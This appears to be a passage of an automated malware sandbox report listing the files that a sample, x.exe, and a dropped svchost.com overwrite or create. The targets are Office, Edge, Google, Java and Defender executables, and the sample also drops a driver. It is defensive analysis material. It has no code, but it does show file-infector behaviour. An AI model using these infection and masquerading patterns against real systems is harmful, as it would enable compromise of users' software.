                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\ConfigSecurityPolicy.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXEJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpDefenderCoreService.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXEJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\mpextms.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\NisSrv.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Google\Update\Install\{6BB58CDD-A64E-41C8-8D92-79A516D3D118}\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXEJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpCmdRun.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXEJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXEJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpDlpCmd.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exeJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXEJump to behavior
                              Source: C:\Windows\svchost.comSystem file written: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exeJump to behavior
                              Source: C:\Users\user\Desktop\x.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to behavior
                              Sample is not signed and drops a device driver
                              Source: C:\Windows\svchost.comFile created: C:\Windows\directx.sysJump to behavior
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\UcMapi.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateComRegisterShell64.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXEJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\PerfBoost.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\X86\MpCmdRun.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\MSOHTMED.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOXMLED.EXEJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCopyAccelerator.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-006E-0409-0000-0000000FF1CE}\misc.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\SETLANG.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Users\user\AppData\Local\Temp\3582-490\x.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Windows\svchost.comJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0C0A-0000-0000000FF1CE}\misc.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\lync99.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Users\user\AppData\Local\Temp\chrome.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXEJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpCopyAccelerator.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXEJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MsMpEng.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\ConfigSecurityPolicy.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXEJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23090.2008-0\MpDefenderCoreService.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXEJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXEJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
                              Source: C:\Windows\svchost.comFile created: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exeJump to dropped file
                              Source: C:\Users\user\Desktop\x.exeFile created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exeJump to dropped file
